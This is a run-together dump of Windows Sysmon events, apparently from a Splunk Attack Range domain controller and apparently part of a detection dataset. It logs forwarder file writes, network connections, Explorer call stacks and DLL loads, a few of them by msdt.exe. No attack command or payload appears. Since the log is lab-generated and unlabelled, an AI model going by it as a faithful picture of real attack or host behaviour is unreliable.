Files\ansible\sysmon\ATTACKRANGE\Administrator{326FD73D-A440-6294-2753-0E0000000000}0xe53272HighMD5=BB98CE2BD520AC69CB3D2F830974CABE,SHA256=C1237BDD2B574C1CBBB4A0D990773BBED5B6FE3BD14F8011C0E79F9CDDCA2B4E,IMPHASH=5D314604CE5F7FF83060B18832AA0D35{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\System32\cmd.exe"cmd.exe" /s /k pushd "C:\Program Files\ansible\sysmon" 23542300x800000000000000099077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:34.031{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7FD764CDF4F4F1DEF7058465FD4E4C5,SHA256=E34517270AFCC7275E0662103FB3BBFB37AA3D54034F5C6C8BED027ADDE91459,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:32.068{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53329-false10.0.1.12-8000- 23542300x800000000000000099153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:35.391{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CADFC3628353B57B35E446EACE6DE186,SHA256=8E347C6246DFC358D94AB89A1D289DC789C3EA26D40F6238FE9B2125693400DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:35.172{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A4CC3B9560E774A5FE527320891D3CD,SHA256=FAE6382C7E816C6E0EB9F0511E8517EDB5F91EE652D885A501E595DBE6CA9420,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:36.266{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99A06F426487A207263FAF0F16AFCA2A,SHA256=AAD41A3192B49F7047E4622BD705C74C3BD98DBA6E93338FADC0F711B44B45A4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099165Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.359{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D70F0C45744604BF5D629216BB88D560,SHA256=1277BC1EF1A983D9CFB6D54E4E22C21A7B25FA0242A8580A40ED312154C7CC56,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099164Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.047{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+eb6a5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099163Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.031{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+eb5be|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099162Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.031{326FD73D-A441-6294-EB00-000000005502}48007160C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6108-000000005502}5488C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+eb587|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bf3f|C:\Windows\System32\windows.storage.dll+13accb|C:\Windows\System32\windows.storage.dll+1391ef|C:\Windows\System32\SHCORE.dll+367b6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000099161Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.031{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\msxml6.dll6.30.14393.5006MSXML 6.0Microsoft XML Core ServicesMicrosoft CorporationMSXML6.dllMD5=713974F49A72B2239989F2C671747CC0,SHA256=52333BF669EBBFFD2E3169AC2F718D4A106A87D73DE74C07E7E824651FDDAFA7,IMPHASH=FCAD6732873DA041FB25E83E799A2652trueMicrosoft WindowsValid 734700x800000000000000099160Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.031{326FD73D-C0E2-6294-370B-000000005502}5132C:\Windows\System32\msdt.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2,IMPHASH=0BE8D1F061DD646F6D2B834CB7C9C900trueMicrosoft WindowsValid 10341000x800000000000000099159Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.016{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9b5f|C:\Windows\System32\SHELL32.dll+ebd30|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.016{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+81330|C:\Windows\System32\SHELL32.dll+ebcec|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.016{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+e9db4|C:\Windows\System32\SHELL32.dll+ebcc0|C:\Windows\System32\TwinUI.dll+100021|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:37.016{326FD73D-A441-6294-EB00-000000005502}48004500C:\Windows\Explorer.EXE{326FD73D-AAC7-6294-6208-000000005502}5940C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+ffe59|C:\Windows\System32\TwinUI.dll+10088f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000099166Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:38.453{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C78102648D90F861C60E616BE61DA34F,SHA256=0AFECF26EABF1FF3B2A8D52EB824084D35BBD5FBC1F34C9969B64E08B04CBA0F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099167Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:39.547{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66DE1BAF80EA0A3C8BC5AC1BF2CA9C8E,SHA256=85E4CDA2A5BCA8C5E318F2D642D2E7B7868F807E527DF993A9F866063E6004E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099168Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:40.641{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54ABC84352CEABC12E878EE4CB952ABC,SHA256=6F941573346EDEBAB2DAA9A69B2EDBD1D28FBAF13ABE01BAF9990B173FB25F1E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099170Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:41.734{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3287722E60F1ECBC38DE9A04C7A6C988,SHA256=B8221D904721456A5646632FC3163CB0B1FC358CBEDAE64AABF8B4C977DE5FBC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099169Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:38.115{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53330-false10.0.1.12-8000- 23542300x800000000000000099171Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:42.828{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DA9046A355B537B3CBC86C0ECAB60AB,SHA256=ACEBF124D38749C10C4EFD12D7CE6787E215BCE6CE8493640B4EE887AE03C684,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:43.927{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80D8ED786635E8381FD2576AC173E59A,SHA256=3E4BE658FB7D4B941403711793D302BD0423F746B33631329692B82BE0AD0375,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:43.599{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4CAD73CD5AB0C8DFA3422767D51D0B27,SHA256=9FD49CE69D568B1042862D0F24C303067C5D86C1BA6670129F755CE5A51F7F3F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:40.412{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53331-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000099173Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:40.412{326FD73D-A262-6294-2300-000000005502}2720C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53331-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 23542300x800000000000000099172Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:43.336{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\respondent-20220530105428-126MD5=3A7897B317CA03B79FE07533175F9643,SHA256=F76FF17815B8F96571634A983322FD544389A7130FC207258DDFB92658757A4D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:44.318{326FD73D-A262-6294-2400-000000005502}2732NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-099f25d280474ac19\channels\health\surveyor-20220530105426-127MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 734700x800000000000000099226Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x800000000000000099225Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x800000000000000099224Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x800000000000000099223Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x800000000000000099222Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 734700x800000000000000099221Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000099220Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000099219Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.896{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000099218Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.881{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000099217Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.881{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000099216Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.881{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000099215Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.881{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000099214Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.881{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000099213Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.881{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000099212Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000099211Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000099210Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000099209Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:04:45.865{326FD73D-C0ED-6294-380B-000000005502}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 